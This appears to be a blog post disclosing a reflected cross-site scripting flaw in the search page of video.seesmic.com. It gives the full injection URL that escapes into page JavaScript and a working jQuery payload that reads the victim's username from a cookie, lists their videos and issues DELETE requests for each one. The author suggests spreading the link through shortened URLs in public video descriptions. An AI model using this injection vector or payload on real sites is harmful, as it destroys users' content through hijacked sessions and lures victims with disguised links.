XSS in video.seesmic.com search; Includes bonus feature
Normally when I see injection vectors it’s simply because unsanitized user input is echoed back to the user in some really obvious fashion. Those get old quickly.
The particular injection point I found was fun because Seesmic took the time to urlencode the search terms to the user, but then later on in the page use that input in a small chunk of Javascript. What’s awesome about that is that we don’t have to include script tags, our input just gets run automatically. More fun than Saturday morning cartoons.
Here is the injection vector. It requires that the victim have a valid Seesmic session open, but just think if somebody posted a video linking to a tinyurl of this and this fun little javascript turned all the users private video’s public
http://video.seesmic.com/search?q=’%2C%20videoSearchCount%3A0%2CpeopleSearchCount%3A0%7D%3Balert(‘xss’)%3Btest%20%3D%20%7Ba%3A’
So who really cares if there is a XSS in video.seesmic.com? I thought about it for a while and came up with one particular exploit that would impact a few seemic users. How about deleteing all of a users videos if they visit a magical link? Here are the details. (I also thought a variant that would make all private video’s public would have been fun, but I just don’t have the time).
1. User with valid session clicks on a nice tiny url. (just think of how many people would click on this in a description for a video in the public stream!)
2. username is parsed from the site cookies.
3. User’s video json feed is loaded up.
4. For each video gathered in step 3, delete the video.
So how about some code? I left out at least one of the utility functions so you have to at least know somewhat is going on to make it work.
// Delete video function
function deletevideo(id) {
jQuery(document).ready(function() {
jQuery.ajax({
type: “DELETE”,
url: “/videos/”+id+”.json”,
data: “preventCache=1234567890″,
});
});
}username = readCookie(“username”);
jQuery.getJSON(“/users/”+username+”/videos.json”,
function(data) {
for ( var i in data ) {
deletevideo(data[i].thread_id);
}
});
